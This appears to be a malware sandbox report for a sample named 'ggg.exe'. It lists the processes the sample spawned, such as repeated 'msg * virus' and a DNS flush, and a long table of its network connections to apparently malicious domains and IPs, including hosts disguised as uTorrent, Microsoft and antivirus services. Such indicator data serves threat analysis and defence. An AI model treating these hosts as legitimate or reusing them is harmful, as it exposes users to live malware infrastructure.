"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5168,i,344577115450505120,5493050804353127054,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:1

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\ggg.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ggg.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f5fe3cb8,0x7ff8f5fe3cc8,0x7ff8f5fe3cd8

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
N/A 127.0.0.1:49848 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 utorrent-backup-server4.top udp
US 8.8.8.8:53 utorrent-backup-server3.top udp
US 154.216.17.44:80 154.216.17.44 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
IT 212.28.178.113:8888 212.28.178.113 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
CN 125.33.228.48:8085 tcp
CN 125.33.228.48:8085 tcp
CN 125.33.228.48:8085 tcp
PL 79.184.130.68:2137 79.184.130.68 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
PL 79.184.130.68:2137 79.184.130.68 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
PL 79.184.130.68:2137 79.184.130.68 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
DE 49.12.117.119:80 49.12.117.119 tcp
FR 5.253.59.29:80 5.253.59.29 tcp
FR 5.253.59.29:80 5.253.59.29 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
NL 45.200.148.45:443 tcp
NL 45.200.148.45:443 tcp
NL 45.200.148.45:443 tcp
CN 139.196.31.48:14417 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 114.215.27.238:8100 tcp
CN 110.90.9.121:8072 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
IN 111.118.250.244:80 111.118.250.244 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
US 75.18.210.21:80 75.18.210.21 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
FR 80.15.103.89:80 80.15.103.89 tcp
CN 112.27.225.72:8001 tcp
CN 110.40.250.173:2324 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
KR 121.142.127.237:8605 121.142.127.237 tcp
CN 121.235.184.125:9000 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
CN 111.42.156.130:8000 tcp
BR 189.61.50.98:8080 189.61.50.98 tcp
US 159.250.122.151:8081 159.250.122.151 tcp
CN 47.103.126.166:8072 tcp
US 68.59.153.1:49274 68.59.153.1 tcp
HK 149.88.73.206:80 149.88.73.206 tcp
US 141.155.36.213:41790 141.155.36.213 tcp
CA 184.145.33.5:80 184.145.33.5 tcp
CN 43.241.17.145:8899 tcp
US 96.250.166.185:88 96.250.166.185 tcp
US 24.252.169.236:80 24.252.169.236 tcp
CA 76.67.131.51:80 76.67.131.51 tcp
MX 187.144.154.105:80 187.144.154.105 tcp
CA 76.68.62.152:80 76.68.62.152 tcp
CA 99.234.132.85:80 99.234.132.85 tcp
MX 187.225.233.208:80 187.225.233.208 tcp
CA 142.67.169.45:80 142.67.169.45 tcp
BE 109.137.108.215:8083 109.137.108.215 tcp
US 166.145.98.1:80 166.145.98.1 tcp
TR 5.26.174.234:80 5.26.174.234 tcp
BG 87.121.86.16:80 utorrent-backup-server3.top tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 utorrent-backup-server5.top udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
HK 103.73.160.35:80 103.73.160.35 tcp
TH 45.141.26.170:80 45.141.26.170 tcp
CN 203.2.65.29:8081 tcp
BE 78.20.115.5:80 78.20.115.5 tcp
CN 202.107.235.202:8088 tcp
CN 118.178.133.241:65500 tcp
CN 119.32.29.121:8309 tcp
CN 61.182.69.190:11111 tcp
FR 80.15.103.89:443 tcp
US 103.130.147.211:80 103.130.147.211 tcp
CN 47.104.173.216:8082 tcp
US 50.116.92.169:443 csg-app.com tcp
US 50.116.92.169:443 csg-app.com tcp
US 50.116.92.169:443 csg-app.com tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
SE 85.230.143.101:80 85.230.143.101 tcp
BG 88.213.212.10:80 monastery.mlnk.net tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
IN 103.92.101.54:80 103.92.101.54 tcp
VN 103.173.254.78:80 103.173.254.78 tcp
IN 103.117.156.102:80 103.117.156.102 tcp
RU 45.151.62.250:80 45.151.62.250 tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
US 8.8.8.8:53 215.108.137.109.in-addr.arpa udp
US 8.8.8.8:53 119.117.12.49.in-addr.arpa udp
US 8.8.8.8:53 44.17.216.154.in-addr.arpa udp
US 8.8.8.8:53 132.249.42.81.in-addr.arpa udp
US 8.8.8.8:53 68.130.184.79.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 185.166.250.96.in-addr.arpa udp
US 8.8.8.8:53 213.36.155.141.in-addr.arpa udp
US 8.8.8.8:53 113.178.28.212.in-addr.arpa udp
US 8.8.8.8:53 236.169.252.24.in-addr.arpa udp
US 8.8.8.8:53 51.131.67.76.in-addr.arpa udp
US 8.8.8.8:53 231.16.11.76.in-addr.arpa udp
US 8.8.8.8:53 152.62.68.76.in-addr.arpa udp
US 8.8.8.8:53 5.33.145.184.in-addr.arpa udp
US 8.8.8.8:53 45.169.67.142.in-addr.arpa udp
US 8.8.8.8:53 234.174.26.5.in-addr.arpa udp
US 8.8.8.8:53 85.132.234.99.in-addr.arpa udp
US 8.8.8.8:53 22.83.233.99.in-addr.arpa udp
US 8.8.8.8:53 69.47.190.67.in-addr.arpa udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
US 8.8.8.8:53 151.122.250.159.in-addr.arpa udp
US 8.8.8.8:53 244.250.118.111.in-addr.arpa udp
US 8.8.8.8:53 105.154.144.187.in-addr.arpa udp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
US 8.8.8.8:53 208.233.225.187.in-addr.arpa udp
US 8.8.8.8:53 21.210.18.75.in-addr.arpa udp
US 8.8.8.8:53 98.50.61.189.in-addr.arpa udp
US 8.8.8.8:53 5.115.20.78.in-addr.arpa udp
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 237.127.142.121.in-addr.arpa udp
US 8.8.8.8:53 238.102.59.187.in-addr.arpa udp
US 8.8.8.8:53 6.74.155.218.in-addr.arpa udp
US 8.8.8.8:53 206.73.88.149.in-addr.arpa udp
US 8.8.8.8:53 211.147.130.103.in-addr.arpa udp
US 8.8.8.8:53 170.26.141.45.in-addr.arpa udp
US 8.8.8.8:53 35.160.73.103.in-addr.arpa udp
US 8.8.8.8:53 101.143.230.85.in-addr.arpa udp
US 8.8.8.8:53 10.212.213.88.in-addr.arpa udp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 104.16.230.132:443 varied-flux-emails-grounds.trycloudflare.com tcp
HK 156.245.12.57:8000 156.245.12.57 tcp
CN 113.219.142.35:80 www.aqianniao.com tcp
US 104.16.230.132:443 varied-flux-emails-grounds.trycloudflare.com tcp
US 24.93.22.147:8081 24.93.22.147 tcp
CN 43.249.193.54:81 tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
CN 60.29.43.10:8072 tcp
ES 47.62.190.226:8081 47.62.190.226 tcp
CN 114.215.27.238:14417 tcp
US 23.122.210.174:80 23.122.210.174 tcp
HK 143.92.62.107:80 143.92.62.107 tcp
IN 122.179.136.112:80 122.179.136.112 tcp
AT 91.142.27.138:80 qgf338jtt8tty7rx.myfritz.net tcp
TR 46.20.5.15:80 files5.uludagbilisim.com tcp
BG 88.80.152.1:80 arcsystem.rodopibg.net tcp
US 13.58.157.220:10640 tcp
HK 156.245.12.92:8000 156.245.12.92 tcp
CN 114.55.106.136:80 tcp
CN 121.43.104.75:81 tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
DZ 41.111.143.136:443 dcwblida.dz tcp
NL 216.252.233.8:443 coindiscussion.net tcp
US 8.8.8.8:53 136.143.111.41.in-addr.arpa udp
US 8.8.8.8:53 8.233.252.216.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 94.130.210.71:443 tcp
GB 91.238.160.241:443 tcp
NL 185.180.196.46:80 tcp
HK 156.245.12.57:8000 tcp
TR 94.73.144.130:443 tcp
KR 1.214.192.147:80 tcp
SG 35.185.187.24:80 35.185.187.24 tcp
DE 172.105.66.118:80 tcp
EC 186.3.78.195:80 tcp
BR 186.225.153.226:443 tcp
US 72.219.74.233:8080 tcp
DE 94.130.210.71:443 tcp
IN 103.14.122.111:80 unicorpbrunei.com tcp
DE 172.105.66.118:8080 tcp
US 209.141.35.225:80 tcp
DE 94.130.210.71:443 tcp
GB 2.22.99.85:443 tcp
GB 142.250.200.3:80 c.pki.goog tcp
DE 94.130.210.71:443 tcp
US 104.21.8.89:443 down.mvip8.ru tcp
US 208.95.112.1:80 ip-api.com tcp
PE 161.132.57.101:80 www.grupodulcemar.pe tcp
US 104.21.82.174:443 tcp
DE 94.130.210.71:443 tcp
US 68.225.217.95:85 tcp
DE 94.130.210.71:443 tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
CN 124.67.254.109:61234 tcp
US 209.94.90.3:443 bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link tcp
DE 146.0.42.82:80 146.0.42.82 tcp
PK 210.56.13.114:80 210.56.13.114 tcp
DE 94.130.210.71:443 tcp
US 170.250.53.236:80 170.250.53.236 tcp
US 104.192.108.21:80 softdl.360tpcdn.com tcp
US 204.138.94.134:443 microsecurityupdate.com tcp
TN 41.230.16.223:8889 41.230.16.223 tcp
US 95.100.195.171:443 www.bing.com tcp
US 66.254.114.41:443 www.pornhub.com tcp
US 66.254.114.41:443 www.pornhub.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
CN 139.198.15.223:8080 tcp
CN 182.92.0.5:80 pid.fly160.com tcp
CN 61.154.0.139:9000 tcp
NL 83.87.76.41:80 83-87-76-41.cable.dynamic.v4.ziggo.nl tcp
GB 64.210.156.19:443 ei.phncdn.com tcp
GB 64.210.156.19:443 ei.phncdn.com tcp
GB 64.210.156.19:443 ei.phncdn.com tcp
GB 64.210.156.19:443 ei.phncdn.com tcp
GB 64.210.156.19:443 ei.phncdn.com tcp
GB 64.210.156.19:443 ei.phncdn.com tcp
GB 64.210.156.19:443 ei.phncdn.com tcp
GB 64.210.156.19:443 ei.phncdn.com tcp
GB 172.217.16.228:443 www.google.com udp
DO 181.36.153.151:81 181.36.153.151 tcp
CN 49.232.126.36:9000 tcp
GB 142.250.178.14:443 clients2.google.com tcp
KR 125.186.91.61:80 125.186.91.61 tcp
KR 119.194.226.67:80 www.ojang.pe.kr tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
DE 94.130.210.71:443 tcp
DE 94.130.210.71:443 tcp
RU 176.113.115.178:80 176.113.115.178 tcp
IT 217.58.56.138:8001 217.58.56.138 tcp
US 206.217.142.166:1234 tcp
US 8.8.8.8:53 178.115.113.176.in-addr.arpa udp
DE 94.130.210.71:443 tcp
CN 39.100.33.142:9092 tcp
DE 94.130.210.71:443 tcp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.235:443 tcp
VN 14.243.221.170:2654 tcp
US 204.138.94.134:80 microsecurityupdate.com tcp
DE 94.130.210.71:443 tcp
GB 20.26.156.215:443 github.com tcp
CN 42.193.42.92:80 tcp
US 8.8.8.8:53 sgz-1302338321.cos.ap-guangzhou.myqcloud.com udp
US 8.8.8.8:53 ftp.ywxww.net udp
US 8.8.8.8:53 www.hseda.com udp
US 8.8.8.8:53 host-95-255-114-11.business.telecomitalia.it udp
US 8.8.8.8:53 antivirus-helper.publicvm.com udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
DE 136.243.111.71:741 antivirus-helper.publicvm.com tcp
VN 113.160.249.9:80 113.160.249.9 tcp
CN 8.130.82.167:80 tcp
CN 139.9.248.128:80 tianyinsoft.top tcp
CN 47.104.169.91:80 tcp
KR 221.143.49.222:80 221.143.49.222 tcp
HK 43.132.13.252:9000 43.132.13.252 tcp
RU 178.130.39.138:80 178.130.39.138 tcp
CN 58.220.203.74:6713 tcp
JP 113.156.110.218:81 113.156.110.218 tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
CN 117.50.194.20:80 tcp
VN 113.160.158.236:80 113.160.158.236 tcp
IN 124.123.123.15:80 124.123.123.15 tcp
CN 119.91.25.19:8888 tcp
SG 158.140.133.56:8090 158.140.133.56 tcp
CN 60.22.23.50:9898 tcp
US 8.8.8.8:53 56.133.140.158.in-addr.arpa udp
KR 119.194.226.67:80 www.ojang.pe.kr tcp
HK 134.122.129.20:80 134.122.129.20 tcp
CN 211.149.230.178:80 hseda.com tcp
US 154.216.17.44:80 main.dsn.ovh tcp
AT 195.26.206.107:80 www.opolis.io tcp
IT 95.255.114.11:80 host-95-255-114-11.business.telecomitalia.it tcp
CN 159.75.57.69:443 sgz-1302338321.cos.ap-guangzhou.myqcloud.com tcp
MX 148.231.192.3:80 desquer.ens.uabc.mx tcp
NL 216.252.233.8:80 coindiscussion.net tcp
CN 121.4.173.197:443 data.discuz.mobi tcp
CN 60.191.208.187:820 123.ywxww.net tcp
DE 172.105.66.118:80 172-105-66-118.ip.linodeusercontent.com tcp
CN 60.191.208.187:820 123.ywxww.net tcp
TR 31.145.124.122:80 www.teknoarge.com tcp
HK 47.79.64.236:443 b46.oss-cn-hongkong.aliyuncs.com tcp
VN 103.163.214.66:80 kiemthehuyenlong.com tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
CN 175.27.229.2:80 goodlabel.cn tcp
CN 211.149.230.178:80 hseda.com tcp
US 23.122.210.174:80 23-122-210-174.lightspeed.cicril.sbcglobal.net tcp
CN 39.100.254.136:80 www.zhikey.com tcp
ID 103.123.98.86:80 103.123.98.86 tcp
DE 87.120.84.39:80 tcp
CN 101.200.223.34:80 tcp
US 166.167.172.14:8240 166.167.172.14 tcp
CN 14.205.93.60:80 src1.minibai.com tcp
CN 60.191.208.187:820 123.ywxww.net tcp
US 208.86.224.90:80 cd.textfiles.com tcp
CN 61.183.42.119:888 dl.natgo.cn tcp
CN 36.138.125.70:8089 tcp
US 104.21.8.89:80 down.mvip8.ru tcp
BG 130.185.193.208:8080 130.185.193.208 tcp
DE 172.105.66.118:8080 172-105-66-118.ip.linodeusercontent.com tcp
US 8.8.8.8:53 14.172.167.166.in-addr.arpa udp
RU 176.113.115.37:80 176.113.115.37 tcp
TH 154.197.69.165:443 tcp
US 166.167.172.14:8007 166.167.172.14 tcp
US 8.8.8.8:53 httpbin.org udp
US 3.223.200.11:443 httpbin.org tcp
US 8.8.8.8:53 home.fvtekx5pt.top udp
US 204.9.23.122:85 204.9.23.122 tcp
NL 194.122.165.159:80 194.122.165.159 tcp
HK 185.106.176.102:80 185.106.176.102 tcp
CN 47.104.173.216:9876 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
KR 211.110.226.148:80 down.pcclear.com tcp
GB 79.133.176.166:80 ldcdn.ldmnq.com tcp
JP 126.23.203.236:80 softbank126023203236.bbtec.net tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
RU 176.113.115.178:80 176.113.115.178 tcp
DE 34.159.64.221:80 home.fvtekx5pt.top tcp
RU 176.113.115.178:80 176.113.115.178 tcp
CN 122.143.2.98:80 down10d.zol.com.cn tcp
GB 103.192.179.31:80 103.192.179.31 tcp
CN 47.108.236.50:8090 tcp
US 144.34.162.13:80 fish.hackbiji.cc tcp
BG 87.121.86.16:80 microsoft-auth-network.cc tcp
US 166.166.188.230:80 230.sub-166-166-188.myvzw.com tcp
IT 95.255.114.11:80 host-95-255-114-11.business.telecomitalia.it tcp
US 65.75.209.59:80 cat.xiaoshabi.nl tcp
CN 218.22.21.248:58080 tcp
AU 80.249.6.118:8084 80.249.6.118 tcp
NL 188.42.129.148:80 rl.ammyy.com tcp
PK 116.58.62.74:80 116.58.62.74 tcp
CN 101.71.255.146:8195 tcp
DE 136.243.104.235:443 tcp
CN 117.161.176.120:80 download.suxiazai.com tcp
DE 94.130.210.71:443 tcp
KR 114.108.160.134:80 global.pcclear.com tcp
DE 94.130.210.71:443 tcp
DE 136.243.18.118:80 www.ammyy.com tcp
CN 47.98.177.117:8888 tcp
DE 136.243.18.118:443 www.ammyy.com tcp
HK 47.79.66.210:80 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
US 104.21.56.70:443 post-to-me.com tcp
CN 119.32.29.121:8309 tcp
PT 188.250.120.10:80 188.250.120.10 tcp
US 8.8.8.8:53 noithaticon.vn udp
US 8.8.8.8:53 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net udp
US 8.8.8.8:53 safe.ywxww.net udp
GB 2.18.190.80:80 r11.o.lencr.org tcp
DE 94.130.210.71:443 tcp
TR 31.145.124.122:443 www.teknoarge.com tcp
DE 94.130.210.71:443 tcp
US 8.8.8.8:53 home.fvtekx5pt.top udp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
US 170.55.7.234:80 170.55.7.234 tcp
DE 34.159.64.221:80 home.fvtekx5pt.top tcp
US 8.8.8.8:53 home.fvtekx5pt.top udp
CN 47.104.233.213:14319 tcp
GB 82.31.159.47:80 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net tcp
CN 180.163.146.109:80 down.qqfarmer.com.cn tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
VN 103.221.220.14:443 noithaticon.vn tcp
HK 8.217.48.27:80 www.qqqmy.com tcp
DE 34.159.64.221:80 home.fvtekx5pt.top tcp
JP 141.147.155.36:8888 141.147.155.36 tcp
CN 14.205.47.252:80 mininews.kpzip.com tcp
HK 156.245.12.57:8000 156.245.12.57 tcp
DE 94.130.210.71:443 tcp
CN 8.138.81.152:5555 tcp
KR 211.231.99.68:80 cfs5.tistory.com tcp
CN 61.131.3.86:9991 tcp
DE 94.130.210.71:443 tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
DE 94.130.210.71:443 tcp
DE 94.130.210.71:443 tcp
DE 94.130.210.71:443 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
HK 47.79.66.208:443 a18qqq1.oss-cn-hongkong.aliyuncs.com tcp
US 142.171.189.54:80 cat.dashabi.in tcp
RU 176.113.115.37:80 176.113.115.37 tcp
VN 14.243.221.170:2654 tcp
CN 159.75.57.35:443 sgz-1302338321.cos.ap-guangzhou.myqcloud.com tcp
KR 59.29.46.120:80 59.29.46.120 tcp
KR 146.56.118.137:80 146.56.118.137 tcp
HK 156.245.12.92:8000 156.245.12.92 tcp
CN 139.196.217.38:80 tengfeidn.com tcp
DO 181.36.153.151:80 181.36.153.151 tcp
RU 92.127.156.174:8880 92.127.156.174 tcp
DE 94.130.210.71:443 tcp
CN 211.91.65.232:80 src1.minibai.com tcp
US 20.83.148.22:8080 20.83.148.22 tcp
CN 47.94.196.131:80 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
DE 94.130.210.71:443 tcp
AT 81.10.240.105:80 81.10.240.105 tcp
RU 89.175.186.155:80 tcp
CN 39.106.158.243:80 soft.110route.com tcp
HK 134.122.129.19:80 134.122.129.19 tcp
CN 119.167.70.110:13332 tcp
GB 82.31.159.47:80 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net tcp
CN 124.220.235.28:80 tcp
CZ 77.240.97.71:81 77.240.97.71 tcp
GB 91.238.160.241:80 jtpdev.co.uk tcp
DE 146.0.42.82:80 146.0.42.82 tcp
HK 219.73.22.64:8084 219.73.22.64 tcp
RU 95.163.152.69:9439 95.163.152.69 tcp
KR 193.123.237.45:80 193.123.237.45 tcp
HK 43.132.12.146:9000 43.132.12.146 tcp
SE 94.255.218.185:80 94.255.218.185 tcp
SG 35.185.187.24:80 35.185.187.24 tcp
GB 89.197.154.115:80 89.197.154.115 tcp
GB 89.197.154.115:80 89.197.154.115 tcp
RU 92.255.57.88:80 92.255.57.88 tcp
CN 36.250.242.248:80 d.kpzip.com tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
DE 94.130.210.71:443 tcp
US 8.8.8.8:53 64.22.73.219.in-addr.arpa udp
US 8.8.8.8:53 45.237.123.193.in-addr.arpa udp
US 8.8.8.8:53 146.12.132.43.in-addr.arpa udp
US 104.26.1.13:443 www.blackhattoolz.com tcp
CN 150.158.25.244:9000 tcp
ES 217.125.11.90:8080 217.125.11.90 tcp
DE 94.130.210.71:443 tcp
IR 217.172.98.87:443 karoonpc.com tcp
IR 185.79.156.69:80 osecweb.ir tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
KR 221.139.49.8:80 www.xn--on3b15m2lco2u.com tcp
KW 178.61.160.6:5001 178.61.160.6 tcp
US 185.199.108.133:443 media.githubusercontent.com tcp
CN 101.200.220.118:8090 tcp
DE 94.130.210.71:443 tcp
DE 94.130.210.71:443 tcp
FR 80.11.228.144:10140 80.11.228.144 tcp
NL 194.122.165.149:80 194.122.165.149 tcp
GB 89.197.154.115:7700 tcp
SG 34.124.148.215:9070 tcp
GB 89.197.154.115:7700 tcp
DE 94.130.210.71:443 tcp
CN 112.5.156.15:20006 data.yhydl.com tcp
CN 180.140.124.53:60 tcp
PK 116.58.10.60:80 cajgtus.com tcp
CN 223.247.198.16:8072 tcp
CN 39.103.150.56:8888 tcp
TN 41.230.16.223:8889 41.230.16.223 tcp
HK 47.79.66.210:443 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
HK 47.79.66.205:80 a12xxx1.oss-cn-hongkong.aliyuncs.com tcp
PL 152.199.23.214:80 update.itopvpn.com tcp
JP 126.23.203.236:80 softbank126023203236.bbtec.net tcp
CN 120.25.163.165:8080 tcp
DE 94.130.210.71:443 tcp
KR 152.67.212.187:443 tcp
CN 101.35.228.105:8888 tcp
KR 218.147.147.172:80 epei77.direct.quickconnect.to tcp
PL 91.225.132.57:80 static-91-225-132-57.devs.futuro.pl tcp
GB 20.26.156.215:443 github.com tcp
VN 103.42.55.251:9999 103.42.55.251 tcp
US 20.83.148.22:80 tcp
GB 89.197.154.115:7700 tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
NL 149.154.167.99:443 tcp
NL 149.154.167.99:443 tcp
DE 94.130.210.71:443 tcp
KR 119.193.158.215:80 119.193.158.215 tcp
DE 94.130.210.71:443 tcp
GB 89.197.154.115:7700 tcp
KR 152.67.212.187:443 tcp
CN 117.50.95.62:9880 tcp
DE 94.130.210.71:443 tcp
CN 125.33.229.165:8085 tcp
DE 94.130.210.71:443 tcp
GB 8.208.41.172:80 c3poolbat.oss-accelerate.aliyuncs.com tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
IR 185.79.156.69:443 osecweb.ir tcp
DE 94.130.210.71:443 tcp
CN 180.163.146.110:80 down.qqfarmer.com.cn tcp
CN 122.190.64.38:80 mininews.kpzip.com tcp
DE 38.242.241.140:80 vmi2145130.contaboserver.net tcp
TR 5.26.97.52:80 5.26.97.52 tcp
GB 89.197.154.115:7700 tcp
DE 94.130.210.71:443 tcp
GB 89.197.154.115:7700 tcp
HK 117.18.7.76:3782 tcp
ES 217.125.11.90:8080 217.125.11.90 tcp
CN 121.43.104.75:8080 tcp
ES 94.76.156.101:280 94.76.156.101 tcp
GB 79.133.176.166:443 ldcdn.ldmnq.com tcp
PL 91.225.132.57:80 static-91-225-132-57.devs.futuro.pl tcp
VN 103.77.173.146:80 103.77.173.146 tcp
RU 83.149.17.194:80 83.149.17.194 tcp
ID 103.58.102.38:80 protechasia.com tcp
CN 120.77.253.240:80 tcp
AR 200.105.67.246:80 www.flechabusretiro.com.ar tcp
MA 102.53.15.54:80 102.53.15.54 tcp
US 208.85.241.111:80 208.85.241.111 tcp
CN 180.163.148.213:80 download.haozip.com tcp
TR 46.20.5.15:80 files5.uludagbilisim.com tcp
GB 20.26.156.215:80 github.com tcp
DE 94.130.210.71:443 tcp
GB 2.18.190.73:80 r11.o.lencr.org tcp
CN 124.70.140.100:80 tcp
SE 185.130.45.176:80 185.130.45.176 tcp
KR 121.53.85.3:80 cfs9.blog.daum.net tcp
US 98.109.126.66:41798 98.109.126.66 tcp
HK 156.245.12.57:8000 156.245.12.57 tcp
CN 182.149.206.216:88 file.blackint3.com tcp
IL 195.60.232.6:100 195.60.232.6 tcp
AT 195.26.206.107:80 www.opolis.eu tcp
CN 139.198.15.223:8080 tcp
KR 210.216.165.152:80 storage.soowim.co.kr tcp
IR 185.79.156.69:443 osecweb.ir tcp
RU 178.130.39.138:80 artemka.spb.ru tcp
ES 178.156.109.69:81 178.156.109.69 tcp
BG 87.227.140.66:9999 87.227.140.66 tcp
MY 210.19.94.140:443 www.maxmoney.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 104.21.75.163:443 offbeat-moans.cyou tcp
GB 2.22.99.85:443 steamcommunity.com tcp
VN 125.212.220.95:443 upload.vina-host.com tcp
GB 172.217.16.228:443 www.google.com udp
VN 103.42.55.251:8080 tcp
DE 188.245.87.202:443 tcp
US 172.67.162.65:443 se-blurry.biz tcp
US 144.34.162.13:80 fish.hackbiji.cc tcp
MA 102.53.15.17:80 102.53.15.17 tcp
CN 121.40.100.23:12616 tcp
CN 180.140.124.53:60 tcp
DE 185.254.96.92:80 185.254.96.92 tcp
HK 47.79.66.210:443 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
